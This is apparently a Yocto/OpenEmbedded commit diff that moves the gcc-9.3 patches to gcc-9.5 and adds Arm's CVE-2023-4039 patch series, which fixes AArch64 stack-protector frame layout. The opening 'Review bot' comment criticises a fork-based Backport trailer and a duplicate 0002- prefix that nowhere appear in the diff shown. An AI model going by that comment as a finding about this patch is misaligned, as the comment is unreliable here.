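Review bot: The `Upstream-Status: Backport [...]` trailer in the patch header cites a commit on a personal GitHub fork (`github.com/hkaelber/gcc`) rather than the GCC project's own repository, so a reader cannot verify the cherry-pick against the canonical source from this reference. The hash on the `cherry picked from commit` line should be cited against the upstream tree instead, e.g. `Upstream-Status: Backport [https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=2b2d97fc545635a0f6aa9c9ee3b017394bc494bf]`. The file also ends without a trailing newline, and its `0002-` prefix duplicates `0002-gcc-poison-system-directories.patch` in the same directory, which makes the patch series order harder to audit.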
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
index 23ec5bce03..23ec5bce03 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
index 17ec8986c1..17ec8986c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
index 3c28aeac63..3c28aeac63 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
index 906f3a7317..906f3a7317 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
index 68a876cb95..68a876cb95 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
index 6acd2b0cf9..6acd2b0cf9 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
index 5a9e527606..5a9e527606 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
index a8103b951e..a8103b951e 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
index d9d563d0f7..d9d563d0f7 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
index f0b79ee145..f0b79ee145 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
index 455858354f..455858354f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
index 2953859238..2953859238 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
index d4445244e2..d4445244e2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
index 6f0833ccda..6f0833ccda 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
index 96da013bf2..96da013bf2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
index 2385099c25..2385099c25 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
index e0129d1f96..e0129d1f96 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
index 1d2182140f..1d2182140f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
index e363c7d445..e363c7d445 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
index 846c0de5e8..846c0de5e8 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
index 102d6fc742..102d6fc742 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
index 443e0a2ca6..443e0a2ca6 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
index 59ac97eaed..59ac97eaed 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
index abfa7516da..abfa7516da 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
index ae8acc7f13..ae8acc7f13 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
index 52a5d97aef..52a5d97aef 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
index bfa7e19dd0..bfa7e19dd0 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
index f8e8c07f62..f8e8c07f62 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
index 60a29fc94d..60a29fc94d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
index 6f048dab82..6f048dab82 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
index f080b0596f..f080b0596f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
index 3b7ccb3e3d..3b7ccb3e3d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
index 5e199fbcfd..5e199fbcfd 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
index 825e070aa3..825e070aa3 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
index f268a4eb58..f268a4eb58 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
index a79fc03d15..a79fc03d15 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
index b69114d1e5..b69114d1e5 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
new file mode 100644
index 0000000000..56d229066f
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
@@ -0,0 +1,1506 @@
1From: Richard Sandiford <richard.sandiford@arm.com>
2Subject: [PATCH 00/19] aarch64: Fix -fstack-protector issue
3Date: Tue, 12 Sep 2023 16:25:10 +0100
4
5This series of patches fixes deficiencies in GCC's -fstack-protector
6implementation for AArch64 when using dynamically allocated stack space.
7This is CVE-2023-4039. See:
8
9https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64
10https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf
11
12for more details.
13
14The fix is to put the saved registers above the locals area when
15-fstack-protector is used.
16
17The series also fixes a stack-clash problem that I found while working
18on the CVE. In unpatched sources, the stack-clash problem would only
19trigger for unrealistic numbers of arguments (8K 64-bit arguments, or an
20equivalent). But it would be a more significant issue with the new
21-fstack-protector frame layout. It's therefore important that both
22problems are fixed together.
23
24Some reorganisation of the code seemed necessary to fix the problems in a
25cleanish way. The series is therefore quite long, but only a handful of
26patches should have any effect on code generation.
27
28See the individual patches for a detailed description.
29
30Tested on aarch64-linux-gnu. Pushed to trunk and to all active branches.
31I've also pushed backports to GCC 7+ to vendors/ARM/heads/CVE-2023-4039.
32
33CVE: CVE-2023-4039
34Upstream-Status: Submitted
35Signed-off-by: Ross Burton <ross.burton@arm.com>
36
37
38From 78ebdb7b12d5e258b9811bab715734454268fd0c Mon Sep 17 00:00:00 2001
39From: Richard Sandiford <richard.sandiford@arm.com>
40Date: Fri, 16 Jun 2023 17:00:51 +0100
41Subject: [PATCH 01/10] aarch64: Explicitly handle frames with no saved
42 registers
43
44If a frame has no saved registers, it can be allocated in one go.
45There is no need to treat the areas below and above the saved
46registers as separate.
47
48And if we allocate the frame in one go, it should be allocated
49as the initial_adjust rather than the final_adjust. This allows the
50frame size to grow to guard_size - guard_used_by_caller before a stack
51probe is needed. (A frame with no register saves is necessarily a
52leaf frame.)
53
54This is a no-op as thing stand, since a leaf function will have
55no outgoing arguments, and so all the frame will be above where
56the saved registers normally go.
57
58gcc/
59 * config/aarch64/aarch64.c (aarch64_layout_frame): Explicitly
60 allocate the frame in one go if there are no saved registers.
61---
62 gcc/config/aarch64/aarch64.c | 8 +++++---
63 1 file changed, 5 insertions(+), 3 deletions(-)
64
65diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
66index a35dceab9fc..e9dad682738 100644
67--- a/gcc/config/aarch64/aarch64.c
68+++ b/gcc/config/aarch64/aarch64.c
69@@ -4771,9 +4771,11 @@ aarch64_layout_frame (void)
70 max_push_offset = 256;
71
72 HOST_WIDE_INT const_size, const_fp_offset;
73- if (cfun->machine->frame.frame_size.is_constant (&const_size)
74- && const_size < max_push_offset
75- && known_eq (crtl->outgoing_args_size, 0))
76+ if (cfun->machine->frame.saved_regs_size == 0)
77+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
78+ else if (cfun->machine->frame.frame_size.is_constant (&const_size)
79+ && const_size < max_push_offset
80+ && known_eq (crtl->outgoing_args_size, 0))
81 {
82 /* Simple, small frame with no outgoing arguments:
83 stp reg1, reg2, [sp, -frame_size]!
84--
852.34.1
86
87
88From 347487fffa0266d43bf18f1f91878410881f596e Mon Sep 17 00:00:00 2001
89From: Richard Sandiford <richard.sandiford@arm.com>
90Date: Fri, 16 Jun 2023 16:55:12 +0100
91Subject: [PATCH 02/10] aarch64: Add bytes_below_hard_fp to frame info
92
93The frame layout code currently hard-codes the assumption that
94the number of bytes below the saved registers is equal to the
95size of the outgoing arguments. This patch abstracts that
96value into a new field of aarch64_frame.
97
98gcc/
99 * config/aarch64/aarch64.h (aarch64_frame::bytes_below_hard_fp): New
100 field.
101 * config/aarch64/aarch64.c (aarch64_layout_frame): Initialize it,
102 and use it instead of crtl->outgoing_args_size.
103 (aarch64_get_separate_components): Use bytes_below_hard_fp instead
104 of outgoing_args_size.
105 (aarch64_process_components): Likewise.
106---
107 gcc/config/aarch64/aarch64.c | 50 +++++++++++++++++++-----------------
108 gcc/config/aarch64/aarch64.h | 6 ++++-
109 2 files changed, 32 insertions(+), 24 deletions(-)
110
111diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
112index e9dad682738..25cf10cc4b9 100644
113--- a/gcc/config/aarch64/aarch64.c
114+++ b/gcc/config/aarch64/aarch64.c
115@@ -4684,6 +4684,8 @@ aarch64_layout_frame (void)
116 last_fp_reg = regno;
117 }
118
119+ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
120+
121 if (cfun->machine->frame.emit_frame_chain)
122 {
123 /* FP and LR are placed in the linkage record. */
124@@ -4751,11 +4753,11 @@ aarch64_layout_frame (void)
125 STACK_BOUNDARY / BITS_PER_UNIT);
126
127 /* Both these values are already aligned. */
128- gcc_assert (multiple_p (crtl->outgoing_args_size,
129+ gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
130 STACK_BOUNDARY / BITS_PER_UNIT));
131 cfun->machine->frame.frame_size
132 = (cfun->machine->frame.hard_fp_offset
133- + crtl->outgoing_args_size);
134+ + cfun->machine->frame.bytes_below_hard_fp);
135
136 cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
137
138@@ -4775,23 +4777,23 @@ aarch64_layout_frame (void)
139 cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
140 else if (cfun->machine->frame.frame_size.is_constant (&const_size)
141 && const_size < max_push_offset
142- && known_eq (crtl->outgoing_args_size, 0))
143+ && known_eq (cfun->machine->frame.bytes_below_hard_fp, 0))
144 {
145- /* Simple, small frame with no outgoing arguments:
146+ /* Simple, small frame with no data below the saved registers.
147 stp reg1, reg2, [sp, -frame_size]!
148 stp reg3, reg4, [sp, 16] */
149 cfun->machine->frame.callee_adjust = const_size;
150 }
151- else if (known_lt (crtl->outgoing_args_size
152+ else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
153 + cfun->machine->frame.saved_regs_size, 512)
154 && !(cfun->calls_alloca
155 && known_lt (cfun->machine->frame.hard_fp_offset,
156 max_push_offset)))
157 {
158- /* Frame with small outgoing arguments:
159+ /* Frame with small area below the saved registers:
160 sub sp, sp, frame_size
161- stp reg1, reg2, [sp, outgoing_args_size]
162- stp reg3, reg4, [sp, outgoing_args_size + 16] */
163+ stp reg1, reg2, [sp, bytes_below_hard_fp]
164+ stp reg3, reg4, [sp, bytes_below_hard_fp + 16] */
165 cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
166 cfun->machine->frame.callee_offset
167 = cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
168@@ -4799,22 +4801,23 @@ aarch64_layout_frame (void)
169 else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
170 && const_fp_offset < max_push_offset)
171 {
172- /* Frame with large outgoing arguments but a small local area:
173+ /* Frame with large area below the saved registers, but with a
174+ small area above:
175 stp reg1, reg2, [sp, -hard_fp_offset]!
176 stp reg3, reg4, [sp, 16]
177- sub sp, sp, outgoing_args_size */
178+ sub sp, sp, bytes_below_hard_fp */
179 cfun->machine->frame.callee_adjust = const_fp_offset;
180 cfun->machine->frame.final_adjust
181 = cfun->machine->frame.frame_size - cfun->machine->frame.callee_adjust;
182 }
183 else
184 {
185- /* Frame with large local area and outgoing arguments using frame pointer:
186+ /* General case:
187 sub sp, sp, hard_fp_offset
188 stp x29, x30, [sp, 0]
189 add x29, sp, 0
190 stp reg3, reg4, [sp, 16]
191- sub sp, sp, outgoing_args_size */
192+ sub sp, sp, bytes_below_hard_fp */
193 cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
194 cfun->machine->frame.final_adjust
195 = cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
196@@ -5243,9 +5246,11 @@ aarch64_get_separate_components (void)
197 if (aarch64_register_saved_on_entry (regno))
198 {
199 poly_int64 offset = cfun->machine->frame.reg_offset[regno];
200+
201+ /* Get the offset relative to the register we'll use. */
202 if (!frame_pointer_needed)
203- offset += cfun->machine->frame.frame_size
204- - cfun->machine->frame.hard_fp_offset;
205+ offset += cfun->machine->frame.bytes_below_hard_fp;
206+
207 /* Check that we can access the stack slot of the register with one
208 direct load with no adjustments needed. */
209 if (offset_12bit_unsigned_scaled_p (DImode, offset))
210@@ -5367,8 +5372,8 @@ aarch64_process_components (sbitmap components, bool prologue_p)
211 rtx reg = gen_rtx_REG (mode, regno);
212 poly_int64 offset = cfun->machine->frame.reg_offset[regno];
213 if (!frame_pointer_needed)
214- offset += cfun->machine->frame.frame_size
215- - cfun->machine->frame.hard_fp_offset;
216+ offset += cfun->machine->frame.bytes_below_hard_fp;
217+
218 rtx addr = plus_constant (Pmode, ptr_reg, offset);
219 rtx mem = gen_frame_mem (mode, addr);
220
221@@ -5410,8 +5415,7 @@ aarch64_process_components (sbitmap components, bool prologue_p)
222 /* REGNO2 can be saved/restored in a pair with REGNO. */
223 rtx reg2 = gen_rtx_REG (mode, regno2);
224 if (!frame_pointer_needed)
225- offset2 += cfun->machine->frame.frame_size
226- - cfun->machine->frame.hard_fp_offset;
227+ offset2 += cfun->machine->frame.bytes_below_hard_fp;
228 rtx addr2 = plus_constant (Pmode, ptr_reg, offset2);
229 rtx mem2 = gen_frame_mem (mode, addr2);
230 rtx set2 = prologue_p ? gen_rtx_SET (mem2, reg2)
231@@ -5478,10 +5482,10 @@ aarch64_stack_clash_protection_alloca_probe_range (void)
232 registers. If POLY_SIZE is not large enough to require a probe this function
233 will only adjust the stack. When allocating the stack space
234 FRAME_RELATED_P is then used to indicate if the allocation is frame related.
235- FINAL_ADJUSTMENT_P indicates whether we are allocating the outgoing
236- arguments. If we are then we ensure that any allocation larger than the ABI
237- defined buffer needs a probe so that the invariant of having a 1KB buffer is
238- maintained.
239+ FINAL_ADJUSTMENT_P indicates whether we are allocating the area below
240+ the saved registers. If we are then we ensure that any allocation
241+ larger than the ABI defined buffer needs a probe so that the
242+ invariant of having a 1KB buffer is maintained.
243
244 We emit barriers after each stack adjustment to prevent optimizations from
245 breaking the invariant that we never drop the stack more than a page. This
246@@ -5671,7 +5675,7 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
247 /* Handle any residuals. Residuals of at least MIN_PROBE_THRESHOLD have to
248 be probed. This maintains the requirement that each page is probed at
249 least once. For initial probing we probe only if the allocation is
250- more than GUARD_SIZE - buffer, and for the outgoing arguments we probe
251+ more than GUARD_SIZE - buffer, and below the saved registers we probe
252 if the amount is larger than buffer. GUARD_SIZE - buffer + buffer ==
253 GUARD_SIZE. This works that for any allocation that is large enough to
254 trigger a probe here, we'll have at least one, and if they're not large
255diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
256index af0bc3f1881..95831637ba7 100644
257--- a/gcc/config/aarch64/aarch64.h
258+++ b/gcc/config/aarch64/aarch64.h
259@@ -712,9 +712,13 @@ struct GTY (()) aarch64_frame
260 HOST_WIDE_INT saved_varargs_size;
261
262 /* The size of the saved callee-save int/FP registers. */
263-
264 HOST_WIDE_INT saved_regs_size;
265
266+ /* The number of bytes between the bottom of the static frame (the bottom
267+ of the outgoing arguments) and the hard frame pointer. This value is
268+ always a multiple of STACK_BOUNDARY. */
269+ poly_int64 bytes_below_hard_fp;
270+
